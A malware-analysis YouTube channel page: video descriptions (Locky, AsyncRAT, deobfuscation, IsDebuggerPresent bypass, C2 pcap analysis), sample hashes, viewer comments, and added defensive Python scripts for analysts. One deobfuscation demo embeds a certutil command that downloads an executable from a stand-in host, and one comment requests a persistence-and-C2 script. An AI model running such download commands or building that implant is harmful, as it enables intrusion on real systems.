CryptoW@re
India
Joined 25 Aug 2015
Hello All,
Welcome to my TH-cam Channel :)
This Channel focuses on cybersecurity topics such as Malware Analysis, Reverse Engineering, OSINT, Threat Hunting, and more.
Analysing Ransomware (Locky) - Part1
In this video, we're analyzing the Locky ransomware using x32dbg. We'll look at some subtle things this malware does before performing encryption. This is Part 1 of our analysis, and in the next part, we'll explore how the encryption mechanism works.
This approach is great for beginners who want to learn how to analyze ransomware.
Disclaimer: Please use a sandboxed environment for malware analysis.
Hash of the sample used- 0537fa38b88755f39df1cd774b907ec759dacab2388dc0109f4db9f0e9d191a0
Link to thezoo github repository - github.com/ytisf/theZoo/
Linkedin: www.linkedin.com/in/shrutirupa-banerjiee/
Twitter: freak_crypt
Github: github.com/Shrutirupa
Instagram: shruti_jiee
#malware #learning #infosec #infosecurity #cyberattack #databreach #malwareanalysis #malwareattacks #malwaredetection #cyber #cybercrime
#staticanalysis #dynamicanalysis #debugging #ransomware #Lockyransom #locky
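Added example, not code from the video or from the Locky sample: before stepping into the encryption routine in the debugger, a quick static pass over the binary (or a memory dump, if the sample is packed) can hint at which algorithm to expect. Statically linked crypto leaves its constant tables in the image; a sample that relies on Windows CryptoAPI/CNG leaves import names instead, and then the interesting breakpoints are on those APIs rather than on a custom loop. The signature values are public reference constants; the sample blob and the filler bytes are constructed for the demo.

```python
import re
import struct

# Added example (not from the video): flag well-known crypto constants and
# Windows CryptoAPI/CNG import names inside a raw byte blob, as a first hint
# of which algorithm a ransomware sample uses. Signature table built from
# public reference values; the sample blob below is synthetic.

BYTE_SIGNATURES = {
    "AES S-box": bytes.fromhex("637c777bf26b6fc53001672bfed7ab76"),
    "AES inverse S-box": bytes.fromhex("52096ad53036a538bf40a39e81f3d7fb"),
    "ChaCha/Salsa20 sigma": b"expand 32-byte k",
}
WORD_SIGNATURES = {   # first four 32-bit words of each table
    "SHA-256 K": (0x428A2F98, 0x71374491, 0xB5C0FBCF, 0xE9B5DBA5),
    "MD5/SHA-1 IV": (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476),
    "MD5 T": (0xD76AA478, 0xE8C7B756, 0x242070DB, 0xC1BDCEEE),
    "CRC32 table[1..4]": (0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419),
}
CRYPTO_API_NAMES = [
    b"CryptAcquireContext", b"CryptGenKey", b"CryptImportKey", b"CryptEncrypt",
    b"CryptDecrypt", b"CryptGenRandom", b"BCryptGenerateSymmetricKey",
    b"BCryptEncrypt", b"BCryptImportKeyPair",
]


def _find_all(blob: bytes, needle: bytes):
    hits, start = [], 0
    while True:
        i = blob.find(needle, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def scan_crypto_constants(blob: bytes):
    """Return sorted (offset, name) pairs for every signature found."""
    hits = []
    for name, sig in BYTE_SIGNATURES.items():
        hits += [(off, name) for off in _find_all(blob, sig)]
    for name, words in WORD_SIGNATURES.items():
        # x86 builds store the tables little-endian; byte-swapped tables
        # (big-endian copies, some hand-written asm) are checked as well.
        for fmt, label in (("<4I", "LE"), (">4I", "BE")):
            sig = struct.pack(fmt, *words)
            hits += [(off, f"{name} ({label})") for off in _find_all(blob, sig)]
    return sorted(hits)


def scan_crypto_imports(blob: bytes):
    """Names of CryptoAPI/CNG functions present as NUL-terminated import strings.

    The lookbehind keeps 'CryptEncrypt' from matching inside 'BCryptEncrypt';
    the optional A/W suffix covers the ANSI/Unicode variants.
    """
    found = []
    for name in CRYPTO_API_NAMES:
        pattern = rb"(?<![A-Za-z])" + re.escape(name) + rb"[AW]?\x00"
        if re.search(pattern, blob):
            found.append(name.decode())
    return found


def build_sample_blob() -> bytes:
    """Constructed stand-in for a code/data section: NOP filler around an
    AES S-box, a SHA-256 K table and a few CryptoAPI import names."""
    filler = b"\x90" * 16
    return (filler + BYTE_SIGNATURES["AES S-box"] + filler
            + struct.pack("<4I", *WORD_SIGNATURES["SHA-256 K"]) + filler
            + b"CryptAcquireContextW\x00CryptGenKey\x00CryptEncrypt\x00" + filler)


if __name__ == "__main__":
    blob = build_sample_blob()
    for off, name in scan_crypto_constants(blob):
        print(f"0x{off:04x}  {name}")
    print("imports:", ", ".join(scan_crypto_imports(blob)))
```

A hit on an S-box or K table tells you where to put a breakpoint; a hit on CryptEncrypt/CryptGenKey tells you the key material passes through a handle, so dump it at CryptExportKey or at the call site instead of hunting for a round function. Absence of both usually means the sample is packed, and the scan should be repeated on a memory dump after unpacking.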
Views: 269
Videos
Deobfuscation Done Easy - Sample5
164 views, 2 months ago
In this video, we are deobfuscating another sample, which looked slightly complicated in the beginning but was easy to deobfuscate once we put various tools and utilities to use. We will gradually move on to more complicated obfuscated samples, and in the upcoming videos we will no longer rely only on static deobfuscation. The videos are beginner friendly. Keep learning and exploring :) Hash: 985dda7...
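Added example, not code from the video or from the sample: the layers in these beginner samples are encodings rather than real obfuscation (base64, PowerShell's base64-over-UTF-16LE, string reversal, single-byte XOR), and the same "peel one layer, look, repeat" loop done by hand in the video can be scripted. The payload is assumed to have already been carved out of its decoding stub; the thresholds, the scoring heuristic and the sample command line (a certutil download to example.invalid) are all constructed for the demo.

```python
import base64
import binascii
import re
import string

# Added example (not from the video): peel encoding layers off a carved
# payload until it reads as plain command text. Handles base64, the
# base64-over-UTF-16LE form used by PowerShell -EncodedCommand, reversed
# base64 and single-byte XOR. Thresholds and the sample are constructed.

B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable.encode())
COMMON = set(b"abcdefghijklmnopqrstuvwxyz ")   # heuristic: lowercase command text
CLEAN_RATIO = 0.8                              # assumption: share of COMMON bytes that means "done"


def text_score(data: bytes) -> float:
    return sum(c in COMMON for c in data) / max(len(data), 1)


def is_base64(data: bytes) -> bool:
    return len(data) >= 8 and len(data) % 4 == 0 and B64_RE.match(data) is not None


def looks_clean(data: bytes) -> bool:
    return all(c in PRINTABLE for c in data) and text_score(data) >= CLEAN_RATIO


def peel_once(data: bytes):
    """Return (layer_name, inner_bytes), or None when nothing recognisable applies."""
    s = data.strip(b" \t\r\n")
    if is_base64(s):
        try:
            raw = base64.b64decode(s, validate=True)
        except binascii.Error:
            return None
        # -EncodedCommand is base64 over UTF-16LE; for an ASCII script every
        # odd byte is zero, so dropping them is the same as decoding UTF-16LE.
        if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
            return "base64(utf-16le)", raw[::2]
        return "base64", raw
    # Padding at the front is the tell for reversed base64. An unpadded
    # reversed string is also valid forwards and is decoded (wrongly) above.
    if is_base64(s[::-1]):
        return "reverse", s[::-1]
    if looks_clean(s):
        return None
    # Single-byte XOR: take the key whose output scores best as text.
    best = max(range(1, 256), key=lambda k: text_score(bytes(c ^ k for c in s)))
    candidate = bytes(c ^ best for c in s)
    if text_score(candidate) >= CLEAN_RATIO:
        return f"xor(0x{best:02x})", candidate
    return None


def deobfuscate(blob: bytes, max_layers: int = 16):
    """Peel layers until plaintext; returns (layer_names, final_bytes)."""
    layers, data = [], blob
    for _ in range(max_layers):
        step = peel_once(data)
        if step is None:
            break
        name, data = step
        layers.append(name)
    return layers, data


# Constructed sample: a certutil download one-liner wrapped, innermost first,
# in XOR 0x5A -> base64 -> reverse -> base64(UTF-16LE).
PLAINTEXT = b"cmd.exe /c certutil -urlcache -split -f http://example.invalid/update.exe %temp%\\update.exe"


def build_sample(plain: bytes = PLAINTEXT, key: int = 0x5A) -> bytes:
    xored = bytes(c ^ key for c in plain)
    reversed_b64 = base64.b64encode(xored)[::-1]
    return base64.b64encode(reversed_b64.decode("ascii").encode("utf-16le"))


if __name__ == "__main__":
    layers, final = deobfuscate(build_sample())
    print(" -> ".join(layers))
    print(final.decode("ascii", "replace"))
```

The scoring only rewards lowercase letters and spaces, which is enough to pick the XOR key for a command line but not for mixed-case or binary payloads; for those, swap in a byte-frequency table or a keyword hit list. Anything the loop cannot peel (a multi-byte key, RC4, a custom substitution) is where the static approach stops and the debugger-based deobfuscation mentioned above for the next videos takes over.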
Solving RE Challenge - 2
82 views, 2 months ago
In this video, we are bypassing the password and also finding the one present in this challenge to successfully get to the "successful" option. Here, we observe how the entered string is compared against the hardcoded string. Disclaimer: Please use a sandboxed environment for this. Linkedin: www.linkedin.com/in/shrutirupa-banerjiee/ Twitter: freak_crypt Github: github.com/Shrutirupa Instagr...
Static Analysis of HTA File (As Requested By the Viewer)
155 views, 3 months ago
In this video, we're analyzing an HTA file that we observed being downloaded from the XLS sample we analyzed in one of our previous videos. This sample appears to be a loader with some embedded files. We've conducted a basic analysis of the sample, and we will analyze the embedded files in our upcoming videos as well. Link to the video of XLS Sample Analysis- th-cam.com/video/pM78cMl2yo8/w-d-xo...
Bypassing IsDebuggerPresent using x32dbg
602 views, 3 months ago
In this video, we are learning how to bypass the IsDebuggerPresent API call while analyzing malware. This is not the only technique used, but it is one of the common techniques employed by malware. Disclaimer: Please use a sandboxed environment for analysing malware. Hash of the sample used- e1dc04d5611806a578a793ef0d188c49858c004a291529e1818585e57993396c Linkedin: www.linkedin.com/in/shrutirup...
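Added example, not code from the video or from the sample: the API call is only the most visible form of the check. IsDebuggerPresent itself just reads PEB.BeingDebugged through the TEB, and malware often inlines that read (or the related PEB.NtGlobalFlag test) so that there is no import to break on. The script below scans a code blob for the 32-bit byte patterns x32dbg shows for those reads and applies the classic "return 0" patch at a function entry. The sample image is constructed; real hits must be confirmed in the disassembler, since raw byte matching can land on data or misaligned instructions.

```python
# Added example (not from the video): spot the PEB-based debugger checks that
# x32dbg shows as raw bytes, and apply the same patch one would type into the
# debugger. 32-bit encodings only; the sample image below is constructed.

FS18 = bytes.fromhex("64A118000000")        # mov eax, fs:[0x18]          -> TEB
FS30 = bytes.fromhex("64A130000000")        # mov eax, fs:[0x30]          -> PEB
TEB_TO_PEB = bytes.fromhex("8B4030")        # mov eax, [eax+0x30]         -> TEB.ProcessEnvironmentBlock
BEING_DEBUGGED = bytes.fromhex("0FB64002")  # movzx eax, byte ptr [eax+2] -> PEB.BeingDebugged
NT_GLOBAL_FLAG = bytes.fromhex("8B4068")    # mov eax, [eax+0x68]         -> PEB.NtGlobalFlag
RET_ZERO = bytes.fromhex("31C0C3")          # xor eax, eax ; ret


def find_peb_checks(code: bytes):
    """Return sorted (offset, kind) for each recognised debugger check.

    Raw byte scanning can hit data or misaligned instructions, so confirm
    every hit in the disassembler before patching.
    """
    hits = []
    pos = code.find(FS30)
    while pos >= 0:
        tail = code[pos + 6:pos + 10]
        if tail.startswith(BEING_DEBUGGED):
            kind = "PEB.BeingDebugged"
        elif tail.startswith(NT_GLOBAL_FLAG):
            kind = "PEB.NtGlobalFlag"      # heap flags 0x70 are set when started under a debugger
        else:
            kind = "PEB access (unclassified)"
        hits.append((pos, kind))
        pos = code.find(FS30, pos + 1)
    pos = code.find(FS18)
    while pos >= 0:
        if code[pos + 6:pos + 9] == TEB_TO_PEB and code[pos + 9:pos + 13] == BEING_DEBUGGED:
            hits.append((pos, "IsDebuggerPresent-style (TEB -> PEB.BeingDebugged)"))
        pos = code.find(FS18, pos + 1)
    return sorted(hits)


def patch_return_zero(image: bytes, offset: int) -> bytes:
    """Overwrite the head of a check with 'xor eax, eax; ret' so it reports
    'no debugger'. Only valid at a function entry that is called, not jumped
    into; an inline check needs its conditional jump NOPed or inverted instead."""
    buf = bytearray(image)
    buf[offset:offset + len(RET_ZERO)] = RET_ZERO
    return bytes(buf)


def build_sample_image() -> bytes:
    """Constructed code blob: an IsDebuggerPresent-like stub followed by a
    function with two inline checks."""
    stub = FS18 + TEB_TO_PEB + BEING_DEBUGGED + b"\xC3"                     # offset 0
    prologue = bytes.fromhex("5589E5")                                      # push ebp; mov ebp, esp
    inline_bd = FS30 + BEING_DEBUGGED + bytes.fromhex("85C0" "7505")        # test eax,eax ; jne +5
    inline_ngf = FS30 + NT_GLOBAL_FLAG + bytes.fromhex("83E070" "7505")     # and eax,0x70 ; jne +5
    return stub + prologue + inline_bd + inline_ngf


if __name__ == "__main__":
    image = build_sample_image()
    for off, kind in find_peb_checks(image):
        print(f"{off:#06x}  {kind}")
    patched = patch_return_zero(image, 0)
    print("after patch:", find_peb_checks(patched))
```

Patching the API (or setting EAX to 0 after the call, as done in the debugger) defeats only the first hit. Writing 0 to PEB.BeingDebugged from the debugger's memory view also covers the inline BeingDebugged read, but not NtGlobalFlag or the heap-flag checks that derive from it; that is what anti-anti-debug plugins such as ScyllaHide for x32dbg exist for. On 64-bit targets the PEB is reached through gs:[0x60] and NtGlobalFlag sits at 0xBC, so the patterns above do not apply as-is.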
Basic RE Challenge - Bypassing Passwords
174 views, 3 months ago
In this video, we are bypassing the password present in this challenge to successfully get to the "success" option. Linkedin: www.linkedin.com/in/shrutirupa-banerjiee/ Twitter: freak_crypt Github: github.com/Shrutirupa Instagram: shruti_jiee #malware #learning #infosec #infosecurity #cyberattack #databreach #malwareanalysis #malwareattacks #malwaredetection #cyber #cybercrime #stati...
Static Analysis of an XLS file - using oletools (As requested by a Viewer)
219 views, 4 months ago
In this video, we're analysing an XLS sample statically using oletools. This sample seems to be a downloader that wants to execute some other files. Although we could not get access to the next-stage file, this much analysis should be enough for a beginner to get started. Disclaimer: Please use a sandboxed environment for analysing malware. Linkedin: www.linkedin.com/in/shrut...
Analysing Real Malware Sample(Debugging) - AsyncRAT (Part2)
337 views, 4 months ago
In this video, we're debugging the sample which we analysed statically in the previous video. I'll be walking you through the exact steps I use in my daily workflow to perform debugging and identify anything interesting during the analysis. This approach could be especially helpful for beginners looking to get a clear understanding of how to handle such threats. Disclaimer: Please use ...
Analysing Real World Sample - ASyncRAT
560 views, 5 months ago
In this video, we're diving into the analysis of ASyncRAT, a notorious Remote Access Trojan (RAT). I'll be walking you through the exact steps I use in my daily workflow to dissect and understand malware samples. This approach could be especially helpful for beginners looking to get a clear understanding of how to handle such threats. Disclaimer: Please use a sandboxed environment for analysing...
Analysing Malicious Packets(CnC) using Wireshark
222 views, 5 months ago
In this video, we are analysing CnC packets using Wireshark. As it is not possible to have a live CnC for analysis unless the sample is extremely recent, I have analysed an existing pcap file containing the related packets. I am using Linux here; it can be run on Windows as well. It is advised to perform analysis in a sandboxed environment. Don't forget to share, like, comment, and subscribe :) You ca...
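Added example, not code from the video or from the pcap it analyses: when a live C2 is not available, the property that still shows up in an old capture is timing. A check-in that fires every N seconds with little jitter stands out from human browsing once connections are grouped by source, destination and port. The script writes and parses a classic (microsecond, Ethernet) pcap with only the standard library, keeps TCP SYNs, and flags groups whose gaps are too regular; the capture, the addresses (documentation ranges) and the thresholds are constructed for the demo.

```python
import ipaddress
import statistics
import struct

# Added example (not from the video): parse a classic pcap with the standard
# library, keep only TCP SYNs, and flag (src, dst, dport) groups whose
# inter-connection gaps are too regular, the usual signature of C2 beaconing.
# The pcap below is constructed in-process; addresses are documentation ranges.

PCAP_MAGIC_USEC = 0xA1B2C3D4      # 0xA1B23C4D is the nanosecond variant (not handled here)
LINKTYPE_ETHERNET = 1


def build_pcap(packets) -> bytes:
    """packets: iterable of (timestamp, src_ip, dst_ip, dport); each becomes
    a bare SYN frame (checksums left zero, enough for offline parsing)."""
    out = bytearray(struct.pack("<IHHiIII", PCAP_MAGIC_USEC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET))
    for ts, src, dst, dport in packets:
        eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
        tcp = struct.pack(">HHIIBBHHH", 49152, dport, 0, 0, 0x50, 0x02, 8192, 0, 0)
        ip = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0,
                         ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
        frame = eth + ip + tcp
        sec = int(ts)
        usec = int(round((ts - sec) * 1_000_000))
        out += struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
    return bytes(out)


def parse_syns(pcap: bytes):
    """Return (timestamp, src, dst, dport) for every TCP SYN (no ACK) frame."""
    magic, _, _, _, _, _, linktype = struct.unpack_from("<IHHiIII", pcap, 0)
    if magic != PCAP_MAGIC_USEC or linktype != LINKTYPE_ETHERNET:
        raise ValueError("expected little-endian microsecond pcap over Ethernet")
    off, syns = 24, []
    while off + 16 <= len(pcap):
        sec, usec, incl, _ = struct.unpack_from("<IIII", pcap, off)
        off += 16
        frame = pcap[off:off + incl]
        off += incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                   # not IPv4 over Ethernet, or not TCP
        ihl = (frame[14] & 0x0F) * 4
        tcp = frame[14 + ihl:]
        if len(tcp) < 14:
            continue
        flags = tcp[13]
        if flags & 0x02 and not flags & 0x10:          # SYN set, ACK clear: a new connection
            src = str(ipaddress.IPv4Address(frame[26:30]))
            dst = str(ipaddress.IPv4Address(frame[30:34]))
            syns.append((sec + usec / 1e6, src, dst, struct.unpack_from(">H", tcp, 2)[0]))
    return syns


def find_beacons(syns, min_connections=4, max_jitter=0.1):
    """Flag groups whose gap coefficient of variation is at most max_jitter.
    Thresholds are assumptions for this example; tune them per environment."""
    groups = {}
    for ts, src, dst, dport in syns:
        groups.setdefault((src, dst, dport), []).append(ts)
    beacons = []
    for (src, dst, dport), times in groups.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        jitter = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        if jitter <= max_jitter:
            beacons.append({"src": src, "dst": dst, "dport": dport, "count": len(times),
                            "interval_s": round(mean, 1), "jitter": round(jitter, 3)})
    return beacons


def build_sample_pcap() -> bytes:
    """Constructed capture: one host beaconing to 203.0.113.7:443 every ~60 s
    with +/-0.4 s jitter, plus irregular browsing to 198.51.100.20:80."""
    beacon = [(1000.0 + 60 * i + (0.4 if i % 2 else -0.4), "10.0.0.5", "203.0.113.7", 443)
              for i in range(8)]
    browsing = [(t, "10.0.0.5", "198.51.100.20", 80) for t in (1003.0, 1009.5, 1140.2, 1141.0, 1390.7)]
    return build_pcap(sorted(beacon + browsing))


if __name__ == "__main__":
    for hit in find_beacons(parse_syns(build_sample_pcap())):
        print(hit)
```

In Wireshark the same view is Statistics > Conversations filtered on `tcp.flags.syn == 1 && tcp.flags.ack == 0`, with the delta-time column sorted per conversation. Real implants add random sleep jitter, so in practice the jitter threshold is loosened and the period is compared against known framework defaults rather than treated as exact; the script only covers the regular case.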
UnderstandingToolsForBeginners - Wireshark Part1
253 views, 6 months ago
In this video, we are learning how to get started with Wireshark. We are learning about capturing packets, and gradually we will learn about identifying malicious packets in Wireshark. I am using Linux here; it can be run on Windows as well. It is advised to perform analysis in a sandboxed environment. Don't forget to share, like, comment, and subscribe :) Linkedin: www.linkedin.com/in/shruti...
Analysis of .Net Sample: Removing Protection & Introduction to Debugging
251 views, 6 months ago
In this video, we are analysing a .NET sample which is protected. The protector that it uses is SmartAssembly. We will also get started with basic debugging of the sample using dnSpy. This malware most probably belongs to the VenomRAT family. Disclaimer: Please use a sandboxed environment for analysing malware. Hash of the sample used- 0ad767569575baeeba2c76169fe9389b805364dd3a71e5e8d818dea5a9...
Malware Analysis - Identifying a Dropper
884 views, 7 months ago
In this video, we are quickly analysing a malware sample which is a dropper, and seeing how we can get some basic details using a debugger. Again, we have used very few tools to analyse and understand the intention of the sample. The sample used here is recent and most probably belongs to the RedLine Stealer malware family. Disclaimer: Please use a sandboxed environment for analysing malware Sample...
Static Malware Analysis - .NET executable
606 views, 7 months ago
In this video, we are performing static analysis of a .NET executable using 3 simple tools - PEStudio, DIE (Detect It Easy) and ILSpy. We are trying to understand what the malicious sample is most probably trying to achieve. Malicious sample - 2E4D8723602C5FFC6409DCEB0CB4CED2E749E374A0FCD41FE92E0FD50F817C5B Link to basic malware videos - th-cam.com/play/PLR_k_vG4Lz0Hrr_pwKQ8STd_QfVBRSVGK.htm...
Deobfuscation Done Easy - Sample4
136 views, 8 months ago
In this video, we are deobfuscating a sample and analysing the deobfuscated part. Initially, the samples chosen are simpler. With time, we will move on to complicated obfuscated samples as well. Make sure you perform analysis in a sandboxed environment. Don't forget to share, like, comment, and subscribe :) Linkedin: www.linkedin.com/in/shrutirupa-banerjiee/ Twitter: freak_crypt ...
Unpacking Malicious File using UPX in Remnux Linux - Malware Analysis
1.4K views, 2 years ago
Static Analysis Of PE Files(using Remnux Linux & FlareVM) : Part 01 - MalwareAnalysis
2K views, 2 years ago
Static Analysis Of PDF File(using Remnux Linux) : Part 02 - MalwareAnalysis
1.3K views, 2 years ago
Understanding Tools & Approach Towards Analysing Malware Samples
478 views, 2 years ago
Static Analysis Of PDF File : Part 01 - MalwareAnalysis
1.3K views, 2 years ago
Static Analysis Of DocFile : Part 3 - Malware Analysis
498 views, 2 years ago
Static Analysis Of Document File: part 2 - Malware Analysis
1K views, 2 years ago
Simple Static Analysis Of Document File for the beginner using Remnux Linux - MalwareAnalysis
4.1K views, 2 years ago
Malware Analysis - Practical Dynamic Analysis using tools and sample Malware - Part3
925 views, 2 years ago
Great! Since I just jumped into this to analyze a few things for myself, I didn't really know the basic commands in Python which other text tutorials omit.
thanks for sharing this analysis, waiting for part-2 ma'am
@harshitsingh2775 Thank you so much ☺️ I will be sharing part 2 soon. I have not been keeping well, so it's getting delayed.
@CryptoWare Ma'am, can you demonstrate how to unpack a packed malware? And also, as ransomware uses encryption, is there any way to find out the encryption algorithm it is using and its keys?
Awesome explanation. Great work. Keep posted us with some more bypass techniques.
@lpr7165 Sure... Thank you so muchhh ❤️❤️❤️
Very informative! Need regular videos 😊
Sure, I will definitely do that. Thank you so much🙂
Nice video, really want to learn reverse engineering of DLL and SYS (driver) files
Thank you so much... I will soon start more videos on these topics too 🙂
Ma'am, can you please make a video about the different certifications related to malware analysis, free as well as paid?
Sure... I will discuss on this soon. 😊
Very well Done
Thank you very much!
You're amazing! I don't miss a video from your channel! I work as an incident response analyst, and your videos help me a lot! I commented once on some of your videos saying this channel is so underrated, and I know in the future this channel will be very big! See my comment as a motivation to continue this project. Thank you! 😁
Thank you so much for your kind words. Means a lot to me... And I'm happy that my videos are able to help you. Really very grateful and thankful... And yes, this definitely motivates me, and I will come up with more videos that could be helpful to my audience ❤️❤️❤️❤️
Cool tricks
I can't wait for you to make a video tutorial on Ghidra, and on how to unpack a file protected by Enigma.
Awesome video as always. A small suggestion: can we have a bit more explained video from next time?
Thank you so much... I would be definitely making an explained video soon. :)
Nothing returns when I search a messagebox string in string references.
Ma'am, I do have the .hta file that needs to be downloaded from the link for you to perform further analysis: 7fbc60658f31b1c1822d5dbe4a0feb66c13f45c48a0f296609c8f6b47aa28954 This is the hash of the file... Hope you perform further analysis and upload another video..........
Thank you so much for sharing. I will definitely share the video. Please allow me some time before uploading.
Thanks for sharing this learning it's very helpful. Can you please share one video on register part of assembly? Thanks!
@LastMinCybersecurity Thank you so much for your kind words. ☺️❤️ I will definitely be covering the topic in my upcoming videos. I will be creating a separate playlist for the assembly part.
Very clear and neat. Nice video.keep post more videos
@sushmithavetri5198 Thank you so muchhhh ❤️
Lovely efforts. Post more videos. Keep yourself fit and fine please.
Thank you so much for your kind words. ☺
Why not dig deeper and find what the password is? The address to the password is stored in RDX just before the call to strcmp - if you set a breakpoint there, you should be able to follow that address and find the password in memory.
Yes, of course, you can find the password. However, here I just wanted to keep it simple by bypassing it. There will be other videos coming where I will be digging deeper. The goal of making videos is not just to showcase everything that is possible in one video, but to cover different/same challenges and try different ways, from bypassing passwords to finding the password to creating a keygen 🙂
Cool
Great explanation, ma'am!! A small question, ma'am: where can I find the malware samples used in this video? Thank you.
You will find these samples on VirusTotal or MalwareBazaar. There are other platforms too which you can look at.
Thank you 😊
@frozenheart8171 welcome 💗🙂
@CryptoWare Can you please provide me a script? I had mailed you.
1) priv escalation 2) persistence using scheduled task 3) resource has a payload which establishes a C2 connection
Your channel is so underrated. Please continue i love your content. ❤
Thank you so much for your kind words. Means a lot. Will be soon bringing some more content... ❤❤❤
Can you please mention the actual file names which you are using for the analysis from theZoo or where to download them, so that I can follow the tutorial and practice.
❤❤❤❤❤❤
Thanks
Hello ma'am, kindly suggest research gaps in this.
Great content, ma'am
Glad you liked it
Good analysis. Which one is the continuation of this video?
Thank you 😊. I will be uploading the extended version.
Thanks for the debugging intro. Want to know from scratch. Take care of your health.
Thanks so much... Surely I will be covering things in more details 🙂
What are some good courses to learn reverse engineering? From the Assembly level as well?
I will be covering some resources soon on my channel. Meanwhile, Practical Reverse Engineering could be one book that you can consider.
Great content, thanks! And is there any tool like de4dot for deobfuscation of C/C++ based files?
Thank you so muchh.. do you mean executables written in C/C++?
@CryptoWare yes
@viral_codes Sure. Will cover that too.
This video is missing how to enable internet, as my internet is not working in REMnux after importing REMnux into VirtualBox.
Try the dhclient command. Most probably an IP address has not been assigned to the device.
Good session, ma'am
Thank you so much 🙂🙂
Thank you for creating this video. It was very helpful on how to perform dynamic malware analysis in a step-by-step process.
Thank you so much
Thanks for your content.
Thank you so much for the support 😊
Your training content is good, I want to improve myself further and I am looking for a road map. Can I contact you?
Thank you so much for the kind words. You can connect with me through LinkedIn or Twitter. You can also elaborate on your query here... I will be more than happy to answer 😊
Hi.
Thanks for the support.... 😊
Why not dnSpy?
I use both dnSpy and ILSpy, whichever I am comfortable with at the time. If I am debugging a .NET sample, I use dnSpy. 🙂 You may choose any tool of your choice.
Very well explained Shruti, keep it up
Thank you so much dear 😇
Which app do you use for recording the screen? Please inform if you are comfortable to share.
This video is yet to be watched from my end. Hi ma'am, I hope you can post a basic videos playlist from scratch so that common people like me can make a career. I mean, I want to know how to start a career, what to go through, how to overcome different difficulties, etc. in our infosec career. I hope you understood. God bless you. Voice is clear in the videos. Keep it up. Please take care of your health.
Hello... Thank you so much for your wonderful comment. I would definitely cover all the pointers that you have mentioned. Meanwhile, I have a playlist where I have covered the basics but they are related to the technical part. Link - th-cam.com/play/PLR_k_vG4Lz0Hrr_pwKQ8STd_QfVBRSVGK.html I would answer all your questions soon in one of my upcoming videos. Thank you so much :)
Indian Acent.
What is the problem with her accent? I am sure she can spell accent correctly unlike you
Make sure to review your own spelling before commenting on someone else's accent
IMO, this is one of the best things in her videos. The accent is easy to capture and understand, this kind of video, where you can focus on the screen/content rather than looking for the subtitles/caption is what one may be comfortable with. Clarity is preferred in both ways, whatever going on in the screen and what the tutor is saying.
This is not useful because today too many good malware samples have anti-VM techniques.
Thank you for your feedback. It may not be helpful for the audience who already have knowledge. However, my videos are mostly beginner friendly. For a start, I'm not complicating things with advanced techniques, but I will be gradually covering the intermediate and advanced techniques. 🙂
Anti-vm
Where to get those pdf file tools ?
These tools come built into REMnux. However, you can directly download the PDF tools from their GitHub links too. These are all open source. 😊
Is this really obfuscated? I don't think so. 😕
Not entirely. That's why I have mentioned starting from the simpler ones. Currently I am covering the encoded or straightforward ones, which are easy to cover to get an idea. I will be gradually covering slightly difficult ones in future videos... 😊
I believe for a malware analyst it seems like simple encoding and not some sort of real obfuscation, but I guess here the malware author was trying to evade EDR and EPP by not simply showing a plain CMD payload, which could be really easy to detect by those detection systems. Neglecting the fact that nowadays EDR & EPP can detect this as well.
Of course it is a simple one. Hence beginner friendly. For malware analysts, real obfuscation deals with something very different and difficult. The rest of the scenarios will be covered gradually, considering all security options involved.
New subscriber from LinkedIn, would look forward to go through with all other videos as well!
Sure.. thank you so muchh.. :)
I have seen all three videos, I learnt many points about malware. Thank you for your time and skills.
Thank you so muchhh ☺️
Well explained
hello~ Is there a way to download the sample files in this tutorial?
You can download the samples from malware bazaar... I will share all hashes soon for you all to download
@@CryptoWare thank you 👍👍👍